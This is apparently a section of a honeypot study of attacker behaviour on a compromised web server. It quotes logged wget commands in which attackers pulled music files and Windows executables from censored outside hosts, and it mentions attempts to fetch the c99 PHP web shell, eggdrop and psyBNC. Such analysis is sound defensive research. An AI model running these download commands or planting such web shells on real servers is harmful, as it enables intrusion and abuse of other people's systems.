Hosting Files

Multiple attempts were made to download files which seemed to be done only for hosting purposes. In one very specific attack, the attacker used over 50 commands to investigate the server and then attempted to download several files. The following shows one attempt to download a music file, and two attempts to download legitimate Windows applications (not related to cracking activities):

10.10.60.66 wget http://censored.fr/explorer/AngelsAndAirwaves/Mp3z-It_Hurts.bkn.mp3
10.10.60.66 wget http://censored.com/support/files/webdwarf.exe
10.10.138.108 wget http://censored.br/ftp/Instala_MasterCaixa.exe

Other files that attackers attempted to download seemed to be intended to help in the exploitation of the server. A common action was to fetch a PHP shell application such as c99 shell (see Appendix B) to allow the attacker to issue shell commands, view the filesystem and perhaps to connect to local databases. Some attackers tried to download the eggdrop IRC bot or the psyBNC IRC proxy.